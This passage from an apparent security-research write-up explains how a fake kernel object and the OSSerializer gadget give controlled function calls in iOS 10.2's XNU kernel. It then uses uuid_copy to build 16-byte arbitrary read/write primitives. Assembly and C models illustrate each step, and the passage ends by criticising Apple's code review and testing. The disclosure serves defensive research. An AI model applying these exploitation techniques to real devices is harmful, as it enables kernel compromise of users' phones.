BR X3 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
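The effect of the gadget can be modelled in plain C, away from any kernel. This is a sketch under stated assumptions: `model_serializer`, `model_serialize` and `record_args` are hypothetical names, and the structure layout assumes 64-bit pointers so that the fields land at the offsets used in the disassembly (+0x10, +0x18, +0x20).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef bool (*model_callback_t)(void *target, void *ref, void *s);

/* Layout chosen to match the loads in the disassembly above
 * (assumes a 64-bit target). */
struct model_serializer {
    uint64_t vtable;            /* +0x00 */
    uint64_t refcount_and_pad;  /* +0x08 */
    void *target;               /* +0x10, becomes the first argument  */
    void *ref;                  /* +0x18, becomes the second argument */
    model_callback_t callback;  /* +0x20, the function that is called */
};

/* Same shape as OSSerializer::serialize: one pointer to data in,
 * a call to a data-supplied function with two data-supplied arguments out. */
bool model_serialize(const struct model_serializer *self, void *s)
{
    return self->callback(self->target, self->ref, s);
}

/* Example callee that records the two arguments it was handed. */
void *seen_target;
void *seen_ref;

bool record_args(void *target, void *ref, void *s)
{
    (void)s;
    seen_target = target;
    seen_ref = ref;
    return true;
}
```

Whoever controls the bytes of the object passed as `self` chooses both the callee and its first two arguments, which is exactly the property the gadget provides.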



Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory, we can replace it with the following fake object, which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.

Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary, but they both take three arguments (source, destination and size) and we can only completely control two.

However, since we already have the ability to read and write this fake object from userspace, we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments, so what we need is a wrapper around one of those which passes a fixed size.

Looking through the cross-references to those functions we find uuid_copy:

; uuid_copy(uuid_t dst, const uuid_t src)

MOV W2, #0x10 ; size

B _memmove

This function is just a simple wrapper around memmove which always passes a fixed size of 16 bytes. Let’s integrate that final primitive into the serializer gadget:

To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object, then receive the exception message to read back the data that was read.
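The way a fixed-size, two-argument copy yields both directions can be sketched as a userspace model. Everything here is hypothetical naming: `model_uuid_copy` stands in for uuid_copy, and `scratch` stands in for the part of the fake object that can be written and read back from userspace. No kernel memory is touched.

```c
#include <stdint.h>
#include <string.h>

#define CHUNK 16  /* uuid_copy always moves exactly 16 bytes */

/* Stand-in for uuid_copy: a two-argument copy with a fixed size. */
void model_uuid_copy(void *dst, const void *src)
{
    memmove(dst, src, CHUNK);
}

/* Models the region of the fake object that userspace can
 * both overwrite and read back. */
uint8_t scratch[CHUNK];

/* Read: destination is the scratch area, source is the target address. */
void model_read16(uint8_t out[CHUNK], const void *addr)
{
    model_uuid_copy(scratch, addr);
    memcpy(out, scratch, CHUNK);    /* models reading the object back */
}

/* Write: same call with the two arguments swapped. */
void model_write16(void *addr, const uint8_t in[CHUNK])
{
    memcpy(scratch, in, CHUNK);     /* models overwriting the object */
    model_uuid_copy(addr, scratch);
}
```

The only difference between the two helpers is which of the two controlled arguments holds the target address, which is why a single fixed-size wrapper is enough for both primitives. Larger transfers would repeat the call 16 bytes at a time.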

You can download my exploit for iOS 10.2 on iPod 6G here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004#c4

This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz. Check out their code to see a different approach to exploiting this bug which also uses mach ports.

Critical code should be criticised

Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.

Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug, the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.

XNU is not alone in this; it’s a common story across many codebases. For example, LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation. For extra irony, the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.
